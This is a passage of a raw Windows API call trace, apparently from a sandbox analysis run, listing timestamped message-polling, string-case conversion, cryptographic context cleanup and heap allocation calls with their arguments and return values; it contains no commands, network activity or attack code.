wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.397] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.397] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.397] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.397] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.397] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.397] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.397] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.397] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.397] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.397] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.397] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.397] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.397] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.397] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.398] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.398] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.399] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.399] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.399] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0199.399] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.399] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0199.399] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.399] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.399] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.399] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.399] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.399] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.399] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0199.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.400] CryptDestroyKey (hKey=0xaa5660) returned 1 [0199.400] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.400] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.400] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.400] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.400] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.400] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.400] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.400] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.400] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.401] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.401] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.401] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.401] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.401] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.401] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.401] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.401] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.402] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.402] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.402] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.402] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.402] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.402] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.402] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.402] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.402] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.402] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.403] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.403] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.403] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.403] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.403] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.403] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.403] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.403] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.403] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.403] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.403] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.404] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.404] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.404] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.404] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.404] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.406] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0199.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.406] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0199.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0199.407] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0199.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.409] FreeLibrary (hLibModule=0x74d40000) returned 1 [0199.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.409] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.409] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.409] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: 